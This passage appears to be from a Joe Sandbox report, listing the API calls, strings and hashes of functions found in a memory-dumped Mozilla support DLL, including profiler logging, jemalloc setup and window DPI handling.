memset.VCRUNTIME140(00000000,00000000,?), ref: 6D557568
CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6D557585
_wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6D557598

Part of subcall function 6D57AB89: EnterCriticalSection.KERNEL32(6D5CE370,?,?,?,6D5434DE,6D5CF6CC,?,?,?,?,?,?,?,6D543284), ref: 6D57AB94
Part of subcall function 6D57AB89: LeaveCriticalSection.KERNEL32(6D5CE370,?,6D5434DE,6D5CF6CC,?,?,?,?,?,?,?,6D543284,?,?,6D5656F6), ref: 6D57ABD1

Strings

(, xrefs: 6D55768A
SHA256, xrefs: 6D556EC0
CryptCATAdminReleaseCatalogContext, xrefs: 6D5572C8
wintrust.dll, xrefs: 6D5572CD

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: CryptInit_thread_footermemset$Cert$ConditionMask$CloseString$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_s
String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
API String ID: 2551977059-3980470659
Opcode ID: 040a2b50e885f9675e8af60d64f208224b56dbc914a0046d0c099d5e0a7482fe
Instruction ID: eccb89b9be7b8ccf3581defbbf2cd48c3464be207dc8abbb4bd1f7da719a8722
Opcode Fuzzy Hash: 040a2b50e885f9675e8af60d64f208224b56dbc914a0046d0c099d5e0a7482fe
Instruction Fuzzy Hash: F352D471D002159BEF26DF24CC84BAA77B8FB85704F11859EE909A7A40DB70AF91CF91

Function 6D5A55F0 Relevance: 77.2, APIs: 22, Strings: 22, Instructions: 163libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(user32,?,6D57E1A5), ref: 6D5A5606
LoadLibraryW.KERNEL32(gdi32,?,6D57E1A5), ref: 6D5A560F
GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6D5A5633
GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6D5A563D
GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6D5A566C
GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6D5A567D
GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6D5A5696
GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6D5A56B2
GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6D5A56CB
GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6D5A56E4
GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6D5A56FD
GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6D5A5716
GetProcAddress.KERNEL32(00000000,FillRect), ref: 6D5A572F
GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6D5A5748
GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6D5A5761
GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6D5A577A
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6D5A5793
GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6D5A57A8
GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6D5A57BD
GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6D5A57D5
GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6D5A57EA
GetProcAddress.KERNEL32(?,DeleteObject), ref: 6D5A57FF

Strings

AreDpiAwarenessContextsEqual, xrefs: 6D5A5637
GetWindowDC, xrefs: 6D5A5710
GetDpiForWindow, xrefs: 6D5A5690
MonitorFromWindow, xrefs: 6D5A578D
SetWindowPos, xrefs: 6D5A56F7
GetThreadDpiAwarenessContext, xrefs: 6D5A562D
GetMonitorInfoW, xrefs: 6D5A57A2
RegisterClassW, xrefs: 6D5A56AC
ShowWindow, xrefs: 6D5A56DE
StretchDIBits, xrefs: 6D5A57CC
GetSystemMetricsForDpi, xrefs: 6D5A5677
CreateWindowExW, xrefs: 6D5A56C5
LoadCursorW, xrefs: 6D5A5774
LoadIconW, xrefs: 6D5A575B
gdi32, xrefs: 6D5A560A
user32, xrefs: 6D5A5601
DeleteObject, xrefs: 6D5A57F9
CreateSolidBrush, xrefs: 6D5A57E4
EnableNonClientDpiScaling, xrefs: 6D5A5666
ReleaseDC, xrefs: 6D5A5742
SetWindowLongPtrW, xrefs: 6D5A57B7
FillRect, xrefs: 6D5A5729

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
API String ID: 2238633743-1964193996
Opcode ID: a1b40e1f8f59671f11858210bcb04ee84e5448d286be52236e2dccc2c9e55ebf
Instruction ID: 1fa42aa91318beb1f5ab2a1f97597c8ca966220cf749b1ecf8f8d151c7d25b26
Opcode Fuzzy Hash: a1b40e1f8f59671f11858210bcb04ee84e5448d286be52236e2dccc2c9e55ebf
Instruction Fuzzy Hash: 96515274515B17ABDF086F758D58F3E3AF8BB06641756442DAA21E7E42EB70C8008F61

Function 6D58F070 Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 412threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6D58F1E0
AcquireSRWLockExclusive.KERNEL32(6D5CF4B8), ref: 6D58F1ED
ReleaseSRWLockExclusive.KERNEL32(6D5CF4B8), ref: 6D58F212

Part of subcall function 6D565B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6D5656EE,?,00000001), ref: 6D565B85
Part of subcall function 6D565B50: EnterCriticalSection.KERNEL32(6D5CF688,?,?,?,6D5656EE,?,00000001), ref: 6D565B90
Part of subcall function 6D565B50: LeaveCriticalSection.KERNEL32(6D5CF688,?,?,?,6D5656EE,?,00000001), ref: 6D565BD8
Part of subcall function 6D565B50: GetTickCount64.KERNEL32 ref: 6D565BE4

Part of subcall function 6D565C50: GetTickCount64.KERNEL32 ref: 6D565D40
Part of subcall function 6D565C50: EnterCriticalSection.KERNEL32(6D5CF688), ref: 6D565D67

Part of subcall function 6D565C50: __aulldiv.LIBCMT ref: 6D565DB4
Part of subcall function 6D565C50: LeaveCriticalSection.KERNEL32(6D5CF688), ref: 6D565DED

GetCurrentThreadId.KERNEL32 ref: 6D58F229
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6D58F231
GetCurrentThreadId.KERNEL32 ref: 6D58F2AE
AcquireSRWLockExclusive.KERNEL32(6D5CF4B8), ref: 6D58F2BB
ReleaseSRWLockExclusive.KERNEL32(6D5CF4B8), ref: 6D58F2F8

Part of subcall function 6D57CBE8: GetCurrentProcess.KERNEL32(?,6D5431A7), ref: 6D57CBF1
Part of subcall function 6D57CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6D5431A7), ref: 6D57CBFA

Part of subcall function 6D589420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6D554A68), ref: 6D58945E
Part of subcall function 6D589420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6D589470
Part of subcall function 6D589420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6D589482
Part of subcall function 6D589420: __Init_thread_footer.LIBCMT ref: 6D58949F

GetCurrentThreadId.KERNEL32 ref: 6D58F350
AcquireSRWLockExclusive.KERNEL32(6D5CF4B8), ref: 6D58F35D
ReleaseSRWLockExclusive.KERNEL32(6D5CF4B8), ref: 6D58F381
GetCurrentThreadId.KERNEL32 ref: 6D58F398
GetCurrentThreadId.KERNEL32 ref: 6D58F489
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6D58F491

Part of subcall function 6D5894D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6D5894EE
Part of subcall function 6D5894D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6D589508

_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6D58F3A0

Part of subcall function 6D58F070: GetCurrentThreadId.KERNEL32 ref: 6D58F440
Part of subcall function 6D58F070: AcquireSRWLockExclusive.KERNEL32(6D5CF4B8), ref: 6D58F44D
Part of subcall function 6D58F070: ReleaseSRWLockExclusive.KERNEL32(6D5CF4B8), ref: 6D58F472

GetCurrentThreadId.KERNEL32 ref: 6D58F559
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6D58F561
GetCurrentThreadId.KERNEL32 ref: 6D58F577
AcquireSRWLockExclusive.KERNEL32(6D5CF4B8), ref: 6D58F585
ReleaseSRWLockExclusive.KERNEL32(6D5CF4B8), ref: 6D58F5A3

Strings

[I %d/%d] profiler_resume_sampling, xrefs: 6D58F499
[I %d/%d] profiler_resume, xrefs: 6D58F239
[D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6D58F56A
[I %d/%d] profiler_pause_sampling, xrefs: 6D58F3A8

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: CurrentExclusiveLock$Thread$AcquireRelease$CriticalSection_getpid$getenv$Count64EnterLeaveProcessTick$CounterInit_thread_footerPerformanceQueryTerminate__acrt_iob_func__aulldiv__stdio_common_vfprintf
String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
API String ID: 899119901-2840072211
Opcode ID: 8a8000594d76656607b1b46b0bc4a80a691e5d247a622df89571e207f245fb16
Instruction ID: 28264595c88bca3d5bfa24b771abc65e77d55ecfe3830e5e4bfacb4bc055d00e
Opcode Fuzzy Hash: 8a8000594d76656607b1b46b0bc4a80a691e5d247a622df89571e207f245fb16
Instruction Fuzzy Hash: 20D14835508B149FDF08AFA8C44476AB7F8FB8A328F12451EE95583E82DB755804CBA3

Function 6D5564C0 Relevance: 47.7, APIs: 21, Strings: 6, Instructions: 406memoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(detoured.dll), ref: 6D5564DF
GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6D5564F2
GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6D556505
GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6D556518
GetModuleHandleW.KERNEL32(user32.dll), ref: 6D55652B
memcpy.VCRUNTIME140(?,?,?), ref: 6D55671C
GetCurrentProcess.KERNEL32 ref: 6D556724
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6D55672F
GetCurrentProcess.KERNEL32 ref: 6D556759
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6D556764
VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6D556A80
GetSystemInfo.KERNEL32(?), ref: 6D556ABE
__Init_thread_footer.LIBCMT ref: 6D556AD3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6D556AE8
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6D556AF7

Strings

_etoured.dll, xrefs: 6D5564ED
nvdxgiwrap.dll, xrefs: 6D556513
nvd3d9wrap.dll, xrefs: 6D556500
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows, xrefs: 6D556798
detoured.dll, xrefs: 6D5564DA
user32.dll, xrefs: 6D556526

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
API String ID: 487479824-2878602165
Opcode ID: 6867a688b2e2683785630b4f93a45ad191bac313aabbbecc907b97e5d36f9168
Instruction ID: d486fa8314fc113953ab1465c58c66024a4e3cc7b7990a8eda0329944a6e879f
Opcode Fuzzy Hash: 6867a688b2e2683785630b4f93a45ad191bac313aabbbecc907b97e5d36f9168
Instruction Fuzzy Hash: 75F1027090475A8FDF26CF24CC88BAAB7B4EF46314F0545DAD809A7A41E731AE94CF91

Function 6D557810 Relevance: 21.4, APIs: 12, Strings: 2, Instructions: 372COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6D5CE744), ref: 6D557885
LeaveCriticalSection.KERNEL32(6D5CE744), ref: 6D5578A5
EnterCriticalSection.KERNEL32(6D5CE784), ref: 6D5578AD
LeaveCriticalSection.KERNEL32(6D5CE784), ref: 6D5578CD
EnterCriticalSection.KERNEL32(6D5CE7DC), ref: 6D5578D4
memset.VCRUNTIME140(?,00000000,00000158), ref: 6D5578E9
EnterCriticalSection.KERNEL32(00000000), ref: 6D55795D
memset.VCRUNTIME140(?,00000000,00000160), ref: 6D5579BB
LeaveCriticalSection.KERNEL32(?), ref: 6D557BBC
memset.VCRUNTIME140(?,00000000,00000158), ref: 6D557C82
LeaveCriticalSection.KERNEL32(6D5CE7DC), ref: 6D557CD2
memset.VCRUNTIME140(00000000,00000000,00000450), ref: 6D557DAF

Strings

D\m, xrefs: 6D55787F
D\m, xrefs: 6D55789F

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: CriticalSection$EnterLeavememset
String ID: D\m$D\m
API String ID: 759993129-2291635499
Opcode ID: 3a1f847541cad0a4904cb93dfa1d759bf7beaf227f43c1b27aa3406d704f68a2
Instruction ID: b71b918b84ae5a8e8a3c856182fb3ec8a410abd09f9935f536d24d264731c563
Opcode Fuzzy Hash: 3a1f847541cad0a4904cb93dfa1d759bf7beaf227f43c1b27aa3406d704f68a2
Instruction Fuzzy Hash: EF025071E0061A8FDB59CF18C9847A9B7B5FF89314F1586AAD809A7711E730BE90CF80

Function 6D5A5FF0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 6D5A6009
OutputDebugStringA.KERNEL32(?,QTm,?), ref: 6D5A6061
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6D5A6069
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6D5A6073
_dup.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6D5A6082
_fdopen.API-MS-WIN-CRT-MATH-L1-1-0(00000000,6D5C148E), ref: 6D5A6091
__stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,QTm,00000000,?), ref: 6D5A60BA
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6D5A60C4

Strings

QTm, xrefs: 6D5A5FFC, 6D5A6042, 6D5A6045, 6D5A60B3

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: DebugDebuggerOutputPresentString__acrt_iob_func__stdio_common_vfprintf_dup_fdopen_filenofclose
String ID: QTm
API String ID: 3461467155-3117915333
Opcode ID: 099f0298069123acf9c9672c00a6c0a683d4f303ef28ae1c8d7c3785178aee44
Instruction ID: e005842a2b50d2b124dec75f7ea85b70477c4d5c89b7610df8a823aae7428f57
Opcode Fuzzy Hash: 099f0298069123acf9c9672c00a6c0a683d4f303ef28ae1c8d7c3785178aee44
Instruction Fuzzy Hash: D321E2709006189FDF206F28DC08BAE7BB8FF85315F05842CE91AA7640CB74A954CFE2

Function 6D56D4D0 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 251COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6D5CE784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6D57D1C5), ref: 6D56D4F2
LeaveCriticalSection.KERNEL32(6D5CE784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6D57D1C5), ref: 6D56D50B

Part of subcall function 6D54CFE0: EnterCriticalSection.KERNEL32(6D5CE784), ref: 6D54CFF6
Part of subcall function 6D54CFE0: LeaveCriticalSection.KERNEL32(6D5CE784), ref: 6D54D026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6D57D1C5), ref: 6D56D52E
EnterCriticalSection.KERNEL32(6D5CE7DC), ref: 6D56D690
LeaveCriticalSection.KERNEL32(6D5CE7DC), ref: 6D56D712
LeaveCriticalSection.KERNEL32(6D5CE784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6D57D1C5), ref: 6D56D751

Strings

: (malloc) Error initializing arena, xrefs: 6D56D82C
<jemalloc>, xrefs: 6D56D827

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$CountInitializeSpin
String ID: : (malloc) Error initializing arena$<jemalloc>
API String ID: 3123517022-3894294050
Opcode ID: 05719f1c8ed268a461b86dd72019c1f34ab0fce5cbb00bb84cef5c84c789f139
Instruction ID: 142f94c0fc4b7d52414345b71b20a8a13d3e7ac1df02a018ed61988aa89660cc
Opcode Fuzzy Hash: 05719f1c8ed268a461b86dd72019c1f34ab0fce5cbb00bb84cef5c84c789f139
Instruction Fuzzy Hash: DD919171A047818FD71CCF68C49072AB7E1EBC9314F258D2EE56AC7E91DB70A845CB62

Function 6D5A7030 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 54windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 6D5A7046
FormatMessageA.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000), ref: 6D5A7060
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6D5A707E

Part of subcall function 6D5581B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6D5581DE

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6D5A7096
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6D5A709C
LocalFree.KERNEL32(?), ref: 6D5A70AA

Strings

(null), xrefs: 6D5A706A, 6D5A7083
### ERROR: %s: %s, xrefs: 6D5A7087

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: __acrt_iob_func$ErrorFormatFreeLastLocalMessage__stdio_common_vfprintffflush
String ID: ### ERROR: %s: %s$(null)
API String ID: 2989430195-1695379354
Opcode ID: b8026b60630b64a37fcaef854edc07bf227e99db07ba9590b3ab9ae6f4177186
Instruction ID: 6c99824464bf6dc6eb999439c40387f12f458249062d7eb57c88f5d283ca4e93
Opcode Fuzzy Hash: b8026b60630b64a37fcaef854edc07bf227e99db07ba9590b3ab9ae6f4177186
Instruction Fuzzy Hash: 5901BEB19001046FDF046BA4DC4AEAF7BBCEF49655F02003DF605E7641D77169148BA2

Function 6D5A4EA0 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 408sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000007D0), ref: 6D5A4EFF
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6D5A4F2E
memset.VCRUNTIME140(00000000,00000000), ref: 6D5A4F62
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6D5A52B2
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6D5A52E6
Sleep.KERNEL32(00000010), ref: 6D5A5481

Strings

(, xrefs: 6D5A5250

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: floor$Sleep$memset
String ID: (
API String ID: 597197541-3887548279
Opcode ID: ac935eb38f01adf5b3da4205aa0e38ffd171532b191d37aae2f7d286f48f051e
Instruction ID: d23513d3468d3b0c47af8d620189bc7ebb1f2f5d728d76912fe738c12e71e8c9
Opcode Fuzzy Hash: ac935eb38f01adf5b3da4205aa0e38ffd171532b191d37aae2f7d286f48f051e
Instruction Fuzzy Hash: 56F1C371919F118FCB16CF38C85062BB7F5AFD6384F068B2EF946A7A51DB3198418B81

Function 6D5A9E30 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 347COMMON

Download Yara Rule

APIs

__aullrem.LIBCMT ref: 6D5A9F3D
__aulldiv.LIBCMT ref: 6D5A9F77
__aullrem.LIBCMT ref: 6D5A9F8C
__aulldiv.LIBCMT ref: 6D5AA023

Strings

-Infinity, xrefs: 6D5A9E60, 6D5A9E7B
NaN, xrefs: 6D5A9EAB

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: __aulldiv__aullrem
String ID: -Infinity$NaN
API String ID: 3839614884-2141177498
Opcode ID: b04e46da8e5eba93e885a7f80534d2db92f281dfda32fc17de6417a00061d41e
Instruction ID: d2f49d7270a96506e599756c17d9433b65d89161d98ab38f3aba427194f623f7
Opcode Fuzzy Hash: b04e46da8e5eba93e885a7f80534d2db92f281dfda32fc17de6417a00061d41e
Instruction Fuzzy Hash: 16C1C071E043299FDB18CFA8C890BAEB7B6FF88304F59442DD505ABA80D771AD45CB91

Function 6D5B545C Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 305COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6D5B8A4B

Strings

~qTm, xrefs: 6D5B56C7, 6D5B9459, 6D5B5703, 6D5B9269, 6D5B5740, 6D5B921F, 6D5B948F

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: memset
String ID: ~qTm
API String ID: 2221118986-306417505
Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction ID: 494a986ea0d96a9365c7df0cc849d298b37cca94a150ce14cb867159d0c8dc99
Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction Fuzzy Hash: 59B1E772E0021A8FDB18CF68CCA17A8B7B6FF95314F1902A9C549DB781D730A985CF90

Function 6D5B542B Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 287COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6D5B88F0
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6D5B925C

Strings

~qTm, xrefs: 6D5B56C7, 6D5B9459, 6D5B5703, 6D5B9269, 6D5B5740, 6D5B921F, 6D5B948F

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
